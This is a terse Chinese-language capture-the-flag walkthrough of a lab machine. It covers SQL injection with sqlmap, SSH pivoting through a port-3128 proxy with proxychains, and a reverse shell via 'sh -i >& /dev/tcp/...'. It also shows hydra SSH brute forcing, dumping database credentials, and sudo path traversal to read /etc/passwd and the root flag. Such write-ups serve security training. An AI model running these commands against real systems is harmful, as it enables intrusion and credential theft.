1.信息收集
主机发现
22端口为过滤状态
访问3128端口
这里应该提示管理员用户为webmaster
访问80端口发先登陆框,burp抓包测试,同时进行目录扫描未发现有用信息
wapplazer指纹识别
输入单引号产生数据库报错,利用sqlmap梭哈
看文档新学绕过方式
账号密码john / hereisjohn
2.getshell
3128端口是一个代理端口
步骤:1.vim /etc/proxychains.conf
把里面的socks注释掉再添加一条
http 192.168.1.61 3128
2.
proxychains nmap -PN 192.168.1.61 -p22 --min-rate 3000 -sT
3.尝试登陆发现调出来了
proxychains ssh john@192.168.1.4
4.尝试进行ssh登陆时可以携带一条指令
proxychains ssh john@192.168.7.61 whoami
5.尝试反弹shell
新开终端监听
nc -lvvp 4444
proxychains ssh john@192.168.7.61 "sh -i >& /dev/tcp/192.168.7.67/4444 0>&1"
ls -al
mv .bashrc .bashrc.bak
尝试重新链接
proxychains ssh john@192.168.7.61
3.提权
cd /var/www
ls-al
cat login.php
发现数据库账号密码为root/root
进行数据库链接 mysql -u root -p
查看数据库 show databases; use SkyTech
查看数据标 show tables;
查看表中数据 select * from login;
保存账号密码使用九头she爆破
proxychains hydra -L username.txt -P passwd.txt ssh://192.168.7.61 -v
使用sara登录还是掉出来了,再重新套路来一遍
vproxychains ssh sara@192.168.7.61"sh -i >& /dev/tcp/192.168.7.67/8080 0>&1"
mv .bashrc .bashrc.bak
sudo -l
sudo /bin/cat /accounts/ ../../etc/passwd
sudo /bin/ls /accounts/ ../../root
sudo /bin/cat /accounts/ ../../root/flag.txt
su root 然后输入密码